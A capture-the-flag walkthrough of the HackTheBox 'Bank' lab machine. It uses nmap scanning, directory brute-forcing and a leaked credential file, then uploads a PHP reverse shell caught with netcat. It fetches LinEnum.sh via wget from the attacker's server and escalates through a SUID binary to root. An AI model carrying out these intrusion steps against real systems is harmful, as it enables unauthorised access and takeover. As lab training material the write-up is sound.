As always, start with nmap -sC -sV -oA ./bank 10.10.10.29
SSH, DNS, and HTTP. I don't know enough information just yet to try SSH or DNS so let's check the web service.
Well that's just the default Apache page. Not very helpful. Dirbuster and gobuster bit show nothing helpful at http://10.10.10.29. It's possible that the webservice is by name and not IP. Let's add bank.htb to /etc/hosts and see if that works.
Ok. Now we can see the login page. Now let's try dirbuster and/or gobuster and try navigating to the page. Navigation shows a login page, gobuster only shows 3 folders, but dirbuster is giving us a treasure trove of information. This situation highlights the necessity of understand different tools that may perform the same functions, but produce VASTLY different outcomes.
Digging through all the Dirbuster discoveries, we eventually get to http://bank.htb/balance_transfer/ which contains .acc files that are all between 583-585 bytes. All except ONE file. There is one that is 257 bytes. There's your anomaly.
Open it and we get:
Oh look. Credentials. So, I log into the portal at http://bank.htb/login.php and we are presented with his HTB Bank transaction list/mim-balance sheet and a Support page.
There's a section to upload a file! If we can upload files, I wonder if there are type restrictions (only accept jpg, png, etc. or allow .php or .py) or if we can execute files. Examining the source code, we have our answer.
Nice. Using the PHP reverse shell from Pentest Monkey and naming it shell.htb, we can fire up netcat and upload the file. Once uploaded, hit the Click Here and you're in.
We have a shell as www-data. Now, on our attacking machine, we navigate to wherever we put LinEnum.sh (which for me is /LinEnum/LinEnum.sh) and once in the LinEnum directory, fire up SimpleHTTPServer with python -m SimpleHTTPServer 9091. From the victim machine, navigate to /tmp and run wget http://[YOURIP]:9091/LinEnum.sh LinEnum is now on the target. Run chmod 777 LinEnum.sh and then ./LinEnum.sh (output of it is in the CTB file above, fair warning: I use -t for thorough). Digging through the output, I notice SUID is set on /var/htb/bin/emergency. What is this file? What does it do?
emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
An ELF? Let's run it! Well, crap. That dropped me out of my tty shell. I run python -c 'import pty; pty.spawn("/bin/bash")' again to get my TTY back and behold! bash-4.3$ What? whoami still shows me as www-data. What weirdness it this? I can cat both flags in here! Ok. That works. One hiccup I did find. If I am in a bash TTY, I cannot cat /root/root.txt, but if I stay in the # sh shell emergency drops me into, then I can cat both.